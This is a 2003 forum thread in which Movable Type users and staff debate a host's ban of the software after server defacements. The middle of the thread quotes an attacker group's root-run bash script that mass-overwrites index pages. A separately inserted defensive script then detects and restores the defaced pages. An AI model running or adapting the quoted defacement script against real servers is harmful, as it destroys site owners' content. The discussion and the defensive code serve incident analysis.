Full Version: Movable Type being banned by ISP Myacen
Movable Type Community Forum > Other Product Discussion > Bugs and Odd Behavior
Jellybean
Myacen, my ISP, just put up a notice on its support forums that it is banning Movable Type and erasing it from all users' directories. They don't explain why. Suggest you contact Myacen.

QUOTE
Just a note, it has now been banned. We will be removing it from our servers over the next few days.
gvtexas
Weird to do this without stating a reason. One of my hosters, hostingmatters, recently banned GreyMatter scripts for new clients, citing a security flaw that allowed upload of php scripts through comments and resource issues (they allow existing accounts to stay if they do a script patch to close the comments hole). But hey, at least they stated *why* and offered alternatives.

If I were you, I'd demand an explanation of "why" from Myacen.

Cheers,
Heartz
Myacen banned it because of this post on the cPanel forums:

http://forums.cpanel.net/showthread.php?s=...&threadid=12013


Can somebody in MT please verify the problem quick.
girlie
What does the post say? I don't want to register just to read it.

If it's about posting malicious code in comments, the Sanitize feature of MT addresses this.
jeffjarvis
Here's what I found at the CPanel forum:
The first post:
QUOTE
Warning - Watch For This Site.
Someone I know just had their server nailed by this.

http://www.crimeperfectz.hpg.com.br/bi0s/devastador

Watch out for this.

cPanel.net Support Ticket Number:


__________________
See http://forum.cpanelhosts.com for another support and How To forum.

If I was posting I could surpass bdraco in posts.


the next:

QUOTE
Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread...&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.



#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
# ##
# Brazilians Intruders 0f Systens Team 2003 ##
# Contact: bi0s@mail.com ##
# irc.brasnet.org /j bi0sbr ##
# www.bi0s.kit.net ##
# Server Devastator by OverKill_ ##
# ##
##################################################
########
procura_paginas() {
find /$DIR_LOG -name index.html >logs
find /$DIR_LOG -name index.htm >>logs
find /$DIR_LOG -name index.php >>logs
#find $DIR_LOG -name *wtmp* >>logs
LINHA=`wc logs |cut -c-7`
}
console() {
REMOVE CODE FOR SAFETY REASONS; echo "ok"
echo -n "==> Aguarde, procurando paginas.."
procura_paginas;
echo "encontrados $LINHA Paginas para Ownar"
sleep 5
echo -n "--> Colocando seu texto nas Paginas"
for log in `cat logs`
do
echo -n " -> in $log..."

cp $log $log.bak
echo $MY_TEXT >$log
echo "ok"
done
echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
echo "ok"
echo "((((( Agora é soh registra! )))))"
}
help() {
echo " Use: $0 "
echo "Exemplo: $0 'BI0S Ownz'"
}

if [ `whoami` != "root" ]; then
echo "[S] Execute somente como root"
exit
fi

if [ "$2" = "" ]; then
DIR_LOG="./"
else
DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo " www.bi0s.kit.net "
echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
help;
else
MY_TEXT="$1"
console;
fi

Last edited by dgbaker on 07-11-2003 at 10:28 PM


And the next:

QUOTE
It was found out by going through bash_history.

Look for /root/mass2.sh /root/devastodor.sh
and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo

And the next:

QUOTE
That is who hit us.
You can see he is proud of the hit here:
http://www.zone-h.org/en/defacement...r_defacer=BI0S/

You can see the top 2 domains are on our server.
Both sites had Movable Type on them as well.

__________________
Thanks,
James Taylor


And here is what is being said by "Robert" the staffer at MyAcen. I suggest that MT contact them soonest!

QUOTE
It's lucky we are on top of things, cruise & brisbane had the ptrace hack on them. If the kernels were not updated regularly your data would be long gone.

I have since removed the files, and on the advice of Nick he urges us to upgrade to phpsuexec ASAP. Movable Type was banned due to the above reason. People are getting in and executing shell based scripts somehow. No exact details have been found but most sites getting hacked are getting hacked via Movable Type.




Get a load of this customer service!:
QUOTE
And as always we provide information. The files won't be removed they will just redirect to a search engine when called.

It's a tough decision to ban a script but when security is an issue I would rather lose a couple of customers that are hell bent on Movable Type than get a whole machine taken out by a script flaw.


and this:
girlie
So, they don't know for sure that it's MT, they just assume because the two users who got hacked were both using MT that it must be MT's fault??
RevKitty
I'm a Myacen customer and a MT user. Myacen have not assumed anything. They have taken the precaution to ban MT which COULD be the source of the problem and I agree with their decision. I would much rather know that they have taken steps to protect their customers than risk security.

If and when the exact source of the problems is determined I'm sure Myacen will consider lifting the ban (if MT is not the problem).

As for their customer service - I have had bad experiences with other hosts in the past who are clearly motivated by money and do not know the meaning of customer service and support. I for one am grateful that Myacen have always been upfront and honest and it's reassuring to know that they care more about security and protecting their customers rather than losing a few dollars on those existing (and potential) customers who will consider leaving over a banned script.
jgreely
I'd be more impressed with their current (and hopefully tentative) decision if they had found something in the web server logs. Finding a shell script in the history file says that the culprits had an interactive session, and provides no supporting evidence for the conclusion that they got in by exploiting a CGI script.

Speaking of which, do the web servers at this ISP actually run as the user whose home directory is /root? As in the user "root"? Sorry, but that piece of the evidence makes it look like someone cracked the machine in a way that is unlikely to have anything to do with CGI. Either that, or the folks running the site have an odd sense of humor when it comes to setting up customer environments.

I should note that I'm running MT on a chrooted Apache using mod_perl, and it couldn't run a shell script if it wanted to, because there aren't any shells (or any other binaries, for that matter) inside the chroot. The fact that this extremely limited environment doesn't impair MT's functionality suggests that the package is pretty well self-contained, and is quite likely one of the safer Perl scripts you could be running on your server.

The only external calls I see in a casual audit are to sendmail and imagemagick/netpbm, and they look pretty clean. Also optional.

Could it be MT? Sure. It could also be PHP, Cpanel, lousy passwords, or a hack to some completely unrelated daemon that's listening for incoming connections (telnet, ssh, pop3/imap, sendmail, etc).

Now, I suppose it's possible that they have a smoking gun that just hasn't been mentioned on that forum, or that they're withholding details to give the folks responsible a chance to fix the hole before it starts getting used more widely, but as presented here, it looks to me like they've jumped the gun by blaming MT.
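The quoted cPanel posts give two concrete things a host can look for without guessing at the entry point: the file names the script was found under in /root, and the script's own footprint (it copies each index.html/index.htm/index.php to "<page>.bak" before overwriting it). The script below is an added example, not code from the thread, from Movable Type or from any of the hosts mentioned; it scans a document root for that footprint, checks the named paths relative to a root you pass in (so it can be pointed at a scratch directory), and restores pages from their .bak copies while keeping the defaced version as evidence. The fixture directory, the ".defaced" suffix and the sample page contents are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the forum thread): hunt for and clean up the
# artifacts left by the quoted defacement script. All paths and fixtures
# below are assumptions for the demonstration.

# Paths the cPanel poster said to look for, made relative to a ROOT argument
# so the check can run against a scratch directory instead of the real /root.
IOC_FILES="root/mass2.sh root/devastador.sh root/.devastador.sh.swp root/.devastador.sh.swo"

# Print each indicator path that exists under ROOT.
find_ioc_files() {
    root="$1"
    for f in $IOC_FILES; do
        [ -e "$root/$f" ] && echo "$root/$f"
    done
    return 0
}

# Print each index page under DIR that has a ".bak" sibling whose content
# differs from the live page. That pairing is exactly what the quoted script
# produces (cp $page $page.bak; echo "$MY_TEXT" > $page). An identical pair
# is treated as an ordinary admin backup and not reported.
find_defaced_pages() {
    dir="$1"
    find "$dir" -type f \( -name index.html -o -name index.htm -o -name index.php \) |
    while IFS= read -r page; do
        bak="$page.bak"
        [ -f "$bak" ] || continue
        if ! cmp -s "$page" "$bak"; then
            echo "$page"
        fi
    done
}

# Number of defaced pages under DIR (handy for a monitoring check).
count_defaced_pages() {
    find_defaced_pages "$1" | wc -l | tr -d ' '
}

# Put the original content back and keep the defaced copy as evidence.
# The .bak timestamp gives the time window to search in the web server logs.
restore_defaced_pages() {
    find_defaced_pages "$1" | while IFS= read -r page; do
        mv "$page" "$page.defaced"
        cp -p "$page.bak" "$page"
        echo "restored $page (defaced copy kept as $page.defaced)"
    done
}

# Constructed fixture: two defaced sites, one site with a clean backup, and one
# of the named indicator files. Prints the scratch directory it created.
make_fixture() {
    base="$(mktemp -d)"
    mkdir -p "$base/www/siteA" "$base/www/siteB" "$base/www/siteC" "$base/root"
    printf '<html>Site A (constructed)</html>\n' > "$base/www/siteA/index.html.bak"
    printf 'defaced page text (constructed)\n' > "$base/www/siteA/index.html"
    printf '<?php echo "Site B (constructed)"; ?>\n' > "$base/www/siteB/index.php.bak"
    printf 'defaced page text (constructed)\n' > "$base/www/siteB/index.php"
    printf '<html>Site C (constructed)</html>\n' > "$base/www/siteC/index.htm"
    cp "$base/www/siteC/index.htm" "$base/www/siteC/index.htm.bak"
    : > "$base/root/devastador.sh"
    echo "$base"
}

# Stand-alone run: build the fixture, report, restore, and clean up.
if [ "${1:-}" = "--demo" ]; then
    fx="$(make_fixture)"
    echo "indicator files:"; find_ioc_files "$fx"
    echo "defaced pages: $(count_defaced_pages "$fx/www")"
    restore_defaced_pages "$fx/www"
    echo "defaced pages after restore: $(count_defaced_pages "$fx/www")"
    rm -rf "$fx"
fi
```

Run it with `--demo` to see it work against the constructed fixture, or call `find_defaced_pages /home` and `find_ioc_files /` on a real box. The content comparison matters: a host that keeps its own "index.html.bak" copies would otherwise produce a false positive on every site.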
btrott
If anyone from Myacen wants to contact us to give us more information about the hack, and why they think Movable Type was responsible, we can be contacted through the contact form.

However, I think it's very important to note *this message* in the thread linked above, which was not quoted above (because it wasn't written yet, I think):

QUOTE
After further investigating, 2 of the 3 domains had Movable Type, the third did not.


This is rather good evidence that the hack is not Movable Type-related. If anyone from Myacen or another host knows anything otherwise, email us. But banning software from a server without real knowledge of whether the software caused the vulnerability, *and* without emailing the creators of the software with more information, strikes me as fairly irresponsible. We've always been very responsive to security issues, but there's nothing we can do without more information.
PasadenaTrails
Just as an update to this thread, check the thread I started here. The quoted "2 out of 3 domains had Movable Type" comment came from my webhost, Excelwebhosting.com. I think one of my sites was one of the 2 MT installations that was hit. In any event, Excelwebhosting is banning MT as well.

Heavy sigh. The sad thing is that Excelwebhosting's service was fast and friendly. Uptime was tremendous, and ping times very good. So I'm sorry to have to leave them.
girlie
FWIW, a former friend of mine who is an IT security professional spent time trying to find security holes in MT (out of his own natural curiosity more than any real concerns with MT).

He never found one. Or, at least, he hadn't by the time we stopped talking to one another.
jgreely
I've been hacking Perl and running large Unix sites for fifteen years now, and I chose MT for my server for the same reason that I chose OpenBSD: they've nailed it down so I don't have to. It's very careful about how it writes to files and executes local binaries. So far, the only thing that I have even the tiniest quibble with is the way it searches for the netpbm packages, if you enable that functionality.

Even then, the only risk is from a local attacker with write privileges to one of the small list of directories searched, and anyone who can do that has already compromised the system in ways that make MT quite irrelevant. And in any case, you can explicitly specify a safe path to the tools and avoid the search.

I bring it up not as an example of poor coding on their part (it isn't), but rather to illustrate just how difficult it was to come up with even a potential, trivial hole in the system, and how easy it was to audit their code to rule out other common attacks.

Another simple reality check was searching the CERT and SANS security-alert archives. How many people use Movable Type? How many relevant security alerts can you find? Compare and contrast to other commonly-installed CGI scripts.

There is one very real weakness in MT's security model: plugins. I'm not saying that any of the existing ones are unsafe, simply that they could be unsafe, and should be examined carefully before use. All of the ones I've looked at so far are fine.
surfmonkey
I'm using (well, trying to use) MT with Berkeley DB format because my host is on Windows, and I'm having problems because it is considered insecure.

The big problem is having to have directories with read/write/delete access. My host just won't do it. Right now I have to go back every day and reset my permissions on the root, then delete index.htm and archives.html just to post to my blog.

Is MySQL a better solution, or am I at the whim of my host with that too? My current situation is pretty unworkable.
distler
Your host is running IIS and thinks that MT is insecure?

That's the funniest thing I've heard in a while. Thanks for making my evening.

Oh, and you should consider finding a webhosting outfit which is running Apache (with SUExec enabled).
MN-Carl
Hello,

Sorry for our delay in responding to this thread. We have just signed up and I will be monitoring this forum as lots of our customers do use Movable Type and I wish to investigate it further and if possible use it/test it.

Myacen currently has not enforced its written ban (posted on our forums) on Movable Type. We are re-investigating the issues and will be discussing it further.

Just thought I'd clear that up.
Heartz
Thanks for coming here Carl to clear all of this up.
Jellybean
Yep, thanks for coming over. And taking the time to investigate this even more.